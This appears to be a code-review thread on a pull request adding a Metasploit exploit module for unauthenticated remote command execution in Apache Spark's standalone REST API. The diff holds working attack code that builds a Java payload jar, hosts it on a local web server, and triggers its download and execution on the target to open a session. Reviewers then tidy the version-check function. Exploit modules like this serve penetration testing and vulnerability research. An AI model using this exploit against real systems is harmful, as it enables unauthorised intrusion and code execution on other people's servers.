modules/exploits/linux/http/spark_unauth_rce.rb

```diff
@@ -0,0 +1,173 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Spark Unauthenticated Command Execution',
+      'Description'    => %q{
+          This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.
+          It uses the function CreateSubmissionRequest to submit a malious java class and trigger it.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'aRe00t',                            # Proof of concept
+          'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.weibo.com/ttarticle/p/show?id=2309404187794313453016'],
+          ['URL', 'https://github.com/vulhub/vulhub/tree/master/spark/unacc']
+        ],
+      'Platform'       => 'java',
+      'Arch'           => [ARCH_JAVA],
+      'Targets'        =>
+        [
+          ['Automatic', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Dec 12 2017',
+      'DefaultTarget'  => 0,
+      'Notes'          =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Stability'   => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION]
+        }
+    ))
+
+    register_options([
+      Opt::RPORT(6066)
+    ])
+
+    register_advanced_options([
+      OptString.new('DownUri', [false, 'The URI to use for this exploit to download and execute. (default is random)'])
+    ])
+
+    deregister_options('URIPATH')
+  end
+
+  def check
+    return CheckCode::Appears if get_version
+
+    return CheckCode::Safe
+  end
+
+  def exploit
+    fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version
+
+    vprint_status("Generating payload ...")
+    @pl = generate_payload.encoded_jar
+    print_error("Failed to generate the payload.") unless @pl
+
+    path = datastore['DownUri'] || rand_text_alpha(8..16)
+
+    if datastore['SRVHOST'].empty? || datastore['SRVHOST'] == '0.0.0.0'
+      binding_ip = Rex::Socket.source_address('1.2.3.4')
+    else
+      binding_ip = datastore['SRVHOST']
+    end
+
+    proto = datastore['SSL'] ? 'https' : 'http'
+    @payload_uri = "#{proto}://#{binding_ip}:#{datastore['SRVPORT']}/#{path}"
+
+    print_status("Starting up our web service ...")
+    start_service({'Uri' => {
+     'Proc' => Proc.new { |cli, req|
+       on_request_uri(cli, req)
+     },
+     'Path' => '/' + path
+    }})
+
+    send_payload
+
+    # Waiting for the incoming session.
+    select(nil,nil,nil,10) until session_created?
+  end
+
+  def get_version
```

Comment:
Seems like there's not much point printing `Spark version is` unless the version is returned.

Golfed / tidied:

```ruby
  def get_version
    @version = nil

    res = send_request_cgi(
      'uri'           => normalize_uri(target_uri.path),
      'method'        => 'GET'
    )

    unless res
      vprint_bad("#{peer} - No response. ")
      return false
    end

    if res.code == 401
      print_bad("#{peer} - Authentication required.")
      return false
    end

    unless res.code == 400
      return false
    end

    res_json = res.get_json_document

    if res_json.empty?
      vprint_bad("#{peer} - Cannot parse the response, seems like it's not Spark REST API.")
      return false
    end

    if res_json['serverSparkVersion']
      @version = res_json['serverSparkVersion'] 
      vprint_status("#{peer} - Spark version is #{@version}")
    end

    true
  end
```

Reply:
Sounds reasonable, thanks @bcoles! 

```
    if res && res.code == 400
      res_json = res.get_json_document
```
If we access the API with the `get` method and no parameters, the server would give a `400` response status code. This is not a mistake.

Reply:
Yes, I understand that. My tidied code operates the same as yours.

Reply:
Sorry, I misunderstand, fixed as you suggest!